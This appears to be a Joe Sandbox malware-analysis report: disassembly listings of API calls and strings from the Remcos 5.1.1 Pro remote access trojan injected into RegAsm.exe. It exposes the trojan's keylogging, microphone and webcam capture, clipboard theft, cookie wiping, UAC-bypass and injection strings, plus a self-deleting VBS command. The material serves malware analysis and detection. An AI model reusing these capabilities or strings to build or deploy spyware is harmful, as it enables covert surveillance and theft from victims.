                                                                                              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                              APIs
                                                                                              • API ID: _free
                                                                                              APIs
                                                                                                • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                              • GetLastError.KERNEL32 ref: 00455D6F
                                                                                              • __dosmaperr.LIBCMT ref: 00455D76
                                                                                              • GetFileType.KERNEL32 ref: 00455D82
                                                                                              • GetLastError.KERNEL32 ref: 00455D8C
                                                                                              • __dosmaperr.LIBCMT ref: 00455D95
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                              • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                              • GetLastError.KERNEL32 ref: 00455F31
                                                                                              • __dosmaperr.LIBCMT ref: 00455F38
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              APIs
                                                                                              • API ID: _free
                                                                                              • String ID: \&G$\&G$`&G
                                                                                              • API ID:
                                                                                              • String ID: 65535$udp
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                              • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                              • __dosmaperr.LIBCMT ref: 0043A926
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                              • __dosmaperr.LIBCMT ref: 0043A963
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                              • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                              • _free.LIBCMT ref: 0043A9C3
                                                                                              • _free.LIBCMT ref: 0043A9CA
                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                              • GetMessageA.USER32 ref: 0040556F
                                                                                              • TranslateMessage.USER32(?), ref: 0040557E
                                                                                              • DispatchMessageA.USER32(?), ref: 00405589
                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                              APIs
                                                                                                • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                              • String ID: 0VG$0VG$<$@$Temp
                                                                                              APIs
                                                                                              • OpenClipboard.USER32 ref: 0041697C
                                                                                              • EmptyClipboard.USER32 ref: 0041698A
                                                                                              • CloseClipboard.USER32 ref: 00416990
                                                                                              • OpenClipboard.USER32 ref: 00416997
                                                                                              • GetClipboardData.USER32 ref: 004169A7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                              • String ID: !D@
                                                                                              • API String ID: 2172192267-604454484
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                              • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                              • String ID:
                                                                                              • API String ID: 297527592-0
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 004481B5
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 004481C1
                                                                                              • _free.LIBCMT ref: 004481CC
                                                                                              • _free.LIBCMT ref: 004481D7
                                                                                              • _free.LIBCMT ref: 004481E2
                                                                                              • _free.LIBCMT ref: 004481ED
                                                                                              • _free.LIBCMT ref: 004481F8
                                                                                              • _free.LIBCMT ref: 00448203
                                                                                              • _free.LIBCMT ref: 0044820E
                                                                                              • _free.LIBCMT ref: 0044821C
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Eventinet_ntoa
                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                              • API String ID: 3578746661-3604713145
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                              • API String ID: 3527080286-3064271455
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                              • API String ID: 1462127192-2001430897
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess
                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                              • API String ID: 2050909247-4242073005
                                                                                              APIs
                                                                                              • _strftime.LIBCMT ref: 00401D50
                                                                                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                              • API String ID: 3809562944-243156785
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                              • int.LIBCPMT ref: 00410EBC
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                              • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                              • String ID: ,kG$0kG
                                                                                              • API String ID: 3815856325-2015055088
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                              • waveInStart.WINMM ref: 00401CFE
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                              • String ID: dMG$|MG$PG
                                                                                              • API String ID: 1356121797-532278878
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                              • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                              • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                              • GetMessageA.USER32 ref: 0041D591
                                                                                              Strings
                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                              • String ID: Remcos
                                                                                              • API String ID: 1970332568-165870891
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                              • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                              • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                              • __freea.LIBCMT ref: 00454083
                                                                                              • __freea.LIBCMT ref: 0045408F
                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                              • String ID:
                                                                                              • API String ID: 201697637-0
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                              • _free.LIBCMT ref: 00445515
                                                                                              • _free.LIBCMT ref: 0044552E
                                                                                              • _free.LIBCMT ref: 00445560
                                                                                              • _free.LIBCMT ref: 00445569
                                                                                              • _free.LIBCMT ref: 00445575
                                                                                              Strings
                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                              • String ID: C
                                                                                              • API String ID: 1679612858-1037565863
                                                                                              Strings
                                                                                              • API ID:
                                                                                              • String ID: tcp$udp
                                                                                              • API String ID: 0-3725065008
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                              • ExitThread.KERNEL32 ref: 004018F6
                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              Strings
                                                                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                              • String ID: PkG$XMG$NG$NG
                                                                                              • API String ID: 1649129571-3151166067
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                              • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                              Strings
                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                              • String ID: .part
                                                                                              • API String ID: 1303771098-3499674018
                                                                                              APIs
                                                                                              • SendInput.USER32 ref: 00419A25
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                              • API ID: InputSend$Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 1167301434-0
                                                                                              APIs
                                                                                              Strings
                                                                                              • API ID: __freea$__alloca_probe_16_free
                                                                                              • String ID: a/p$am/pm$h{D
                                                                                              • API String ID: 2936374016-2303565833
                                                                                              APIs
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • _free.LIBCMT ref: 00444E87
                                                                                              • _free.LIBCMT ref: 00444E9E
                                                                                              • _free.LIBCMT ref: 00444EBD
                                                                                              • _free.LIBCMT ref: 00444ED8
                                                                                              • _free.LIBCMT ref: 00444EEF
                                                                                              Strings
                                                                                              • API ID: _free$AllocateHeap
                                                                                              • String ID: KED
                                                                                              • API String ID: 3033488037-2133951994
                                                                                              APIs
                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                              Strings
                                                                                              • API ID: Enum$InfoQueryValue
                                                                                              • String ID: [regsplt]$xUG$TG
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                              • __fassign.LIBCMT ref: 0044B4F9
                                                                                              • __fassign.LIBCMT ref: 0044B514
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                              Similarity
                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                              • String ID: xUG$NG$NG$TG
                                                                                              APIs
                                                                                                • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                              • _wcslen.LIBCMT ref: 0041B7F4
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                              APIs
                                                                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                              Similarity
                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                              Strings
                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreatePointerWrite
                                                                                              • String ID: xpF
                                                                                              APIs
                                                                                                • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                              • _free.LIBCMT ref: 00450FC8
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00450FD3
                                                                                              • _free.LIBCMT ref: 00450FDE
                                                                                              • _free.LIBCMT ref: 00451032
                                                                                              • _free.LIBCMT ref: 0045103D
                                                                                              • _free.LIBCMT ref: 00451048
                                                                                              • _free.LIBCMT ref: 00451053
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                              • int.LIBCPMT ref: 004111BE
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                              • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                              • String ID: (mG
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                              • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              APIs
                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                              • CoUninitialize.OLE32 ref: 00407664
                                                                                              Similarity
                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                              • GetLastError.KERNEL32 ref: 0040BB22
                                                                                              Strings
                                                                                              • UserProfile, xrefs: 0040BAE8
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                              • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                              APIs
                                                                                              • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Console$AllocOutputShowWindow
                                                                                              • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 0043ACE9
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                              • __allrem.LIBCMT ref: 0043AD1C
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                              • __allrem.LIBCMT ref: 0043AD51
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: H_prologSleep
                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                              APIs
                                                                                                • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
